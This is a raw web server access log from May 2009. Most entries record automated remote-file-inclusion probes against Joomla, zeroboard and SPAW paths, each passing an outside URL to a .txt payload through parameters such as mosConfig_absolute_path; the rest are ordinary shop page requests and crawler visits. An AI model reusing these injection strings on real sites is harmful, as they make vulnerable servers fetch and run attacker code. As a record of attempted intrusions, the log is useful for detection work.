202.21.134.11 - - [12/May/2009:00:58:50 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:50 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:50 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:50 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:51 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:51 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:52 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L005AB5479F200500DB5C09U+M37+ENG HTTP/1.1" 200 45235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:54 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L005AB5479F200500DB5C09U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:54 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L005AB5479F200500DB5C09U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
190.144.44.36 - - [12/May/2009:00:59:06 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:59:06 -0400] "GET /logs/access_log.Q108092600//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:59:06 -0400] "GET /logs/access_log.Q108072300//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:59:06 -0400] "GET //skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.110.19.178 - - [12/May/2009:00:59:43 -0400] "GET /logs/access_log.Q109050700///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:00:59:43 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:00:59:43 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
211.110.19.178 - - [12/May/2009:00:59:43 -0400] "GET /logs/error_log.Q109040300///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.805"
190.144.44.36 - - [12/May/2009:00:59:54 -0400] "GET //modules//icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:59:54 -0400] "GET /logs//modules//icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:59:54 -0400] "GET /logs/access_log.Q109012400%20%20//modules//icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:00:03 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:00:03 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:00:04 -0400] "GET /logs/access_log.Q108090900%20%20//modules//icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.72.114 - - [12/May/2009:01:00:17 -0400] "GET /logs/error_log.Q108012700 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.142.126 - - [12/May/2009:01:00:33 -0400] "GET /logs/error_log.Q108090300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.154.202.203 - - [12/May/2009:01:01:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/5.0 (compatible; BuiltWith/0.3; +http://builtwith.com/bot.html)"
190.144.44.36 - - [12/May/2009:01:01:44 -0400] "GET /logs/access_log.Q108092600%20%20//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:01:44 -0400] "GET /logs/access_log.Q108072300%20%20//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:01:02:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [12/May/2009:01:02:24 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:02:24 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:02:24 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.825"
88.84.128.40 - - [12/May/2009:01:02:25 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:25 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:25 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:02:25 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:25 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:02:25 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
69.172.126.16 - - [12/May/2009:01:02:26 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:26 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:26 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:02:27 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:02:27 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:02:27 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:02:29 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:02:29 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:29 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:29 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:29 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:02:30 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
147.27.14.31 - - [12/May/2009:01:02:30 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:31 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:31 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:31 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:31 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:02:31 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:31 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:31 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:31 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.191.103.144 - - [12/May/2009:01:02:32 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:02:32 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:34 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:34 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:37 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:37 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:37 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:02:38 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:01:02:38 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:02:39 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
147.27.14.31 - - [12/May/2009:01:02:46 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:46 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:02:47 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:02:48 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
123.125.64.38 - - [12/May/2009:01:03:11 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.172.126.16 - - [12/May/2009:01:03:42 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:03:42 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
190.144.44.36 - - [12/May/2009:01:03:48 -0400] "GET //skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:03:48 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:03:59 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:03:59 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:04:02 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:04:02 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:04:02 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
217.18.76.16 - - [12/May/2009:01:04:04 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:05 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:05 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:06 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:06 -0400] "GET /logs/error_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:06 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:06 -0400] "GET /logs/error_log.Q108111500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:07 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:07 -0400] "GET /logs/error_log.Q108071800/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:08 -0400] "GET /logs/error_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:09 -0400] "GET /logs/access_log.Q109011400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:16 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:16 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
88.191.103.144 - - [12/May/2009:01:04:20 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:04:21 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:04:21 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
217.18.76.16 - - [12/May/2009:01:04:24 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:25 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:04:25 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
147.27.14.31 - - [12/May/2009:01:04:35 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:04:36 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
